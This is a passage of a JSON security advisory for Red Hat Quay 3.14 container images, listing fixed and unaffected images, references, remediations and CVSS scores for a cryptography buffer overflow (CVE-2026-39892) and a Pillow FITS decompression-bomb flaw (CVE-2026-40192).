          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-39892"
        },
        {
          "category": "external",
          "summary": "RHBZ#2456735",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2456735"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-39892",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-39892"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-39892",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39892"
        },
        {
          "category": "external",
          "summary": "http://www.openwall.com/lists/oss-security/2026/04/08/12",
          "url": "http://www.openwall.com/lists/oss-security/2026/04/08/12"
        },
        {
          "category": "external",
          "summary": "https://github.com/pyca/cryptography/commit/622d672e429a7cff836a23c5903683dbec1901f5",
          "url": "https://github.com/pyca/cryptography/commit/622d672e429a7cff836a23c5903683dbec1901f5"
        },
        {
          "category": "external",
          "summary": "https://github.com/pyca/cryptography/security/advisories/GHSA-p423-j2cm-9vmq",
          "url": "https://github.com/pyca/cryptography/security/advisories/GHSA-p423-j2cm-9vmq"
        }
      ],
      "release_date": "2026-04-08T20:49:41.967000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-05-26T17:12:40+00:00",
          "details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11458",
          "product_ids": [
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:21017"
        },
        {
          "category": "workaround",
          "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
          "product_ids": [
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "LOW",
            "baseScore": 7.3,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
            "version": "3.1"
          },
          "products": [
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "cryptography: Cryptography: Buffer overflow via non-contiguous buffer in API"
    },
    {
      "cve": "CVE-2026-40192",
      "cwe": {
        "id": "CWE-409",
        "name": "Improper Handling of Highly Compressed Data (Data Amplification)"
      },
      "discovery_date": "2026-04-16T00:00:49.590876+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2458856"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in Pillow, a Python imaging library. This vulnerability allows a remote attacker to trigger a denial of service (DoS) by providing a specially crafted FITS image file. The library\u0027s failure to limit the amount of GZIP-compressed data during decoding can lead to unbounded memory consumption, causing the system to crash or experience severe performance issues.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "Pillow: Pillow: Denial of Service via decompression bomb in FITS image processing",
          "title": "Vulnerability summary"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le"
        ],
        "known_not_affected": [
          "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-40192"
        },
        {
          "category": "external",
          "summary": "RHBZ#2458856",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2458856"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-40192",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-40192"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-40192",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40192"
        },
        {
          "category": "external",
          "summary": "https://github.com/python-pillow/Pillow/commit/3cb854e8b2bab43f40e342e665f9340d861aa628",
          "url": "https://github.com/python-pillow/Pillow/commit/3cb854e8b2bab43f40e342e665f9340d861aa628"
        },
        {
          "category": "external",
          "summary": "https://github.com/python-pillow/Pillow/pull/9521",
          "url": "https://github.com/python-pillow/Pillow/pull/9521"
        },
        {
          "category": "external",
          "summary": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-whj4-6x5x-4v2j",
          "url": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-whj4-6x5x-4v2j"
        },
        {
          "category": "external",
          "summary": "https://pillow.readthedocs.io/en/stable/releasenotes/12.2.0.html#prevent-fits-decompression-bomb",
          "url": "https://pillow.readthedocs.io/en/stable/releasenotes/12.2.0.html#prevent-fits-decompression-bomb"
        }
      ],
      "release_date": "2026-04-15T22:53:56.147000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-05-26T17:12:40+00:00",
          "details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11458",
          "product_ids": [
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:21017"
        },
        {
          "category": "workaround",
          "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
          "product_ids": [
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64",
